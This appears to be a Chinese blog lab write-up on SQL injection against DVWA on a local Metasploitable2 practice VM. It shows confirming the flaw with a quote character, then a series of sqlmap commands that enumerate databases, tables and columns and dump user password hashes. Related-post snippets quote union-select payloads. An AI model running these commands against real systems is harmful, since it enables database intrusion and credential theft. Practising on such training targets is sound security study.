SQL注入的环境搭建与简单操作

最新推荐文章于 2023-06-27 22:57:57 发布
最新推荐文章于 2023-06-27 22:57:57 发布
阅读量657 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51627527/article/details/111224436
版权

SQL注入:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。

环境搭建

启动Metasploitable2虚拟机后,查看虚拟机的IP地址
然后在火狐浏览器中输入Metasploitable2虚拟机的IP地址,打开后发现有DVWA
在这里插入图片描述
打开后将安全级别设为最低
在这里插入图片描述
然后再火狐中下载插件(cookie quick manager使用方法可以百度查找)来获取cookie
在【SQL Injection】项中提交ID为22(地址栏出现id=22,就是MySQL的注入点)
在这里插入图片描述
获得注入点为地址栏的内容。
同时在下载的插件中获取cookie值:
在这里插入图片描述
然后可以进行如下的操作了。

1、注入点发现。首先肯定是要判断是否有注入漏洞。

在这里插入图片描述
在输入框输入1,返回
ID:1
First name:admin
Surname:admin
返回正常
再次输入1’ ,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
此时可以断定有SQL注入漏洞。
下面利用SQLMap进行注入攻击,同时将DVWA安全级别设置为最低;

2、枚举当前使用的数据库名称和用户名。

sqlmap语法参数:

-u:指定目标URL,即注入点
--cookies:当前会话的cookies值
-b:获取数据库类型,检索数据库管理系统标识
--current-db:获取当前数据库
--current-user:获取当前登录数据库使用的用户

你输入的命令:

sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" 
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd' 
-b --current-db --current-user

Sqlmap输出截图。
在这里插入图片描述

3、枚举数据库用户名和密码
-string:当查询可用时用来匹配页面中的字符串
-user:枚举DBMS用户
-password:枚举DBMS用户密码hash

你输入的命令:

sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" --users –password

Sqlmap输出截图。
在这里插入图片描述

4、枚举数据库
--dbs:枚举当前数据库

你输入的命令:

sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" –dbs

Sqlmap输出截图。
在这里插入图片描述

5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
--tables:枚举指定数据库的所有表

你输入的命令:

sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" -D dvwa –tables

Sqlmap输出截图。
在这里插入图片描述

6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
--columns:获取列的信息

你输入的命令:

sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" -D dvwa -T users –columns

Sqlmap输出截图。
在这里插入图片描述

7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
--dump:存储数据表项

你输入的命令:

sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" -D dvwa -T users -C user,password –dump

Sqlmap输出截图。
在这里插入图片描述
查看down到本地的用户名与密码,截图。(提示带 . 的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件和文件夹,在按一次取消显示)
cd 切换目录
vi 打开文本
方法:
通过在终端输入: cd /root/.local/share/sqlmap/output/192.168.91.129/dump/dvwa
然后再用 vi users.csv 打开即可

寄快递 那儿都通
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA之LOW级别SQL注入---SQLMap使用
weixin_42465260的博客
08-05 7835
看到这篇文章,相信大家对于DVWA的搭建已经没问题了吧,在这里就不在赘述DVWA的搭建过程。 SQLMap之dvwa简单使用实例: 一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回 ID: 1 First name: admin Surname: admin 返回正常; 再次输入1',报错,返回 You have an error in your SQL syntax...
SQL注入之联合查询法(基于Metasploitable2-Linux)
qq_43578780的博客
11-24 363
1、联合查询 在之前的文章中,我们已经学习了SQL注入的基本步骤,而联合查询法其基本步骤一样。 分别是:猜闭合方式、用二分法来猜测表的列数、观察显示位、寻找数据库、寻找表、寻找列、寻找数据 2、用联合查询的方式在Metasploitable2-Linux的Less-1中进行SQL注入 (1):猜闭合方式 在一般情况下,我们要进行SQL注入是无法得知闭合方式的,所以我们一般用手工进行不断的猜测,或用...
web安全入门之SQL注入-基于metasploitable2-Linux
weixin_43726831的博客
09-08 1062
SQL注入 1.SQL注入介绍 我们在学习SQL注入前,先要对SQL以及数据库有一定的了解。 SQL(Structured Query Language)是一种关系数据库标准语言,SQL其为结构化的查询语言的简称,但其功能包括数据定义,数据查询,数据操纵和数据控制四部分。SQL简洁方便、功能齐全,是目前应用最广的关系数据库语言。 数据定义SQL(DDL):CREATE(创建)、DROP(丢弃) 数...
SQL注入之了解数据库和数据库查询流程、注入了解(基于Metasploitable2-Linux)
qq_43578780的博客
11-21 333
1、数据库和SQL的基本了解 我们在学习SQL注入之前,先要对数据库和SQL进行一定的了解。 (1)数据库 Oracal(大型):它是在数据库领域一直处于领先地位的产品,系统可移植性好、使用方便、功能强,适用于各类大、中、小、微机环境。它是一种高效率、可靠性好的、适应高吞吐量的数据库方案。 MySQL(开源,常用):是一种开放源代码的关系型数据库管理系统(RDBMS),使用最常用的数据库管理语言–...
SQL注入部分:DVWA+SQLmap+Mysql注入实战
qq_51650968的博客
12-04 857
实验环境搭建。启动Metasploitable2虚拟机 首先在kali上扫描到metasploitable2的ip地址 nmap 192.168.75.0/24 找到靶机ip 在kali的firefox浏览器上搜索ip地址并打开DVWA 在DVWA Security上修改安全等级为low 然后进行注入点发现 在SQL Injection上id搜索1 可以看见上方地址栏有显示id=1 再次输入1,报错,返回 You have an error in your SQL syntax; check th
本地搭建简单SQL注入环境
endeav_or的博客
08-10 1万+
首先本地要有一个wamp server,因为SQL注入涉及到与数据库交互,所以先从搭建测试数据库开始。       打开mysql console,输入root账户密码登陆。创建一个数据库,并命名为fake,命令如下:create database fake;      因为我之前已经建立好了,这里直接配置fake数据库的用户权限,配置为leon用户访问,且leon用户的密码为leon,命令如下:
搭建简单的Oracle/SQL练习环境
小9的专栏
06-25 4010
1、安装Oracle Express Edition(快捷版),请自行下载:http://www.oracle.com/technetwork/products/express-edition/downloads/index.html 只安装服务器,客户端我们通过别的方式安装。 安装过程记住你的sys账号的密码,这个不能忘。 2、 2.1 到这个网址http://www.oracle.c
sql注入讲解ppt.pptx
08-10
4. 操作方便:SQL 注入攻击可以通过简单的输入来实现,攻击者可以使用自动化工具来快速实现攻击。 二、SQL 注入基础知识: 1. PHP 语言基础:了解 PHP 语言的基础知识,熟悉 MySQL 的一些函数和语句。 2. MySQL ...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
高职院校SQL注入攻击实验环境搭建及使用研究.pdf
09-19
高职院校SQL注入攻击实验环境搭建及使用研究.pdf
SQL注入漏洞简单挖掘-01
09-15
SQL注入漏洞简单挖掘-01 SQL注入漏洞是Web应用程序中的一种常见漏洞,它是由于Web应用程序对用户输入的不当处理所导致的。SQL注入漏洞的成因是由于Web应用程序使用用户输入数据构建SQL语句时,没有正确地过滤和转义...
自己动手编写SQL注入漏洞扫描工具
06-22
SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL语句来操纵数据库,获取敏感信息或执行非法操作。这个项目可能是用编程语言如Python、Java或C#实现的,其目的是帮助用户理解SQL注入的工作...
DVWA通过攻略之SQL注入
勿山几已
05-24 8540
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA之SQL注入
热门推荐
qq_58091216的博客
05-01 2万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 5977
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入
DVWA-------简单SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA靶场之SQL注入通关详解
qq_62169455的博客
06-27 3294
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
DVWA——SQL注入
qq_62803993的博客
01-08 2440
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
算机科学与技术 基于Java的医务室病例管理小程序的设计与实现.docx
最新发布
07-20
算机科学与技术 基于Java的医务室病例管理小程序的设计与实现
sql注入如何搭建环境
06-14
搭建SQL注入攻击环境通常涉及以下几个步骤: 1. **选择平台**: - 你可以使用虚拟机(如Vagrant或Docker)来创建一个干净的开发环境,这样可以隔离真实生产环境。 - 或者在本地服务器上安装Web服务器(如Apache或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值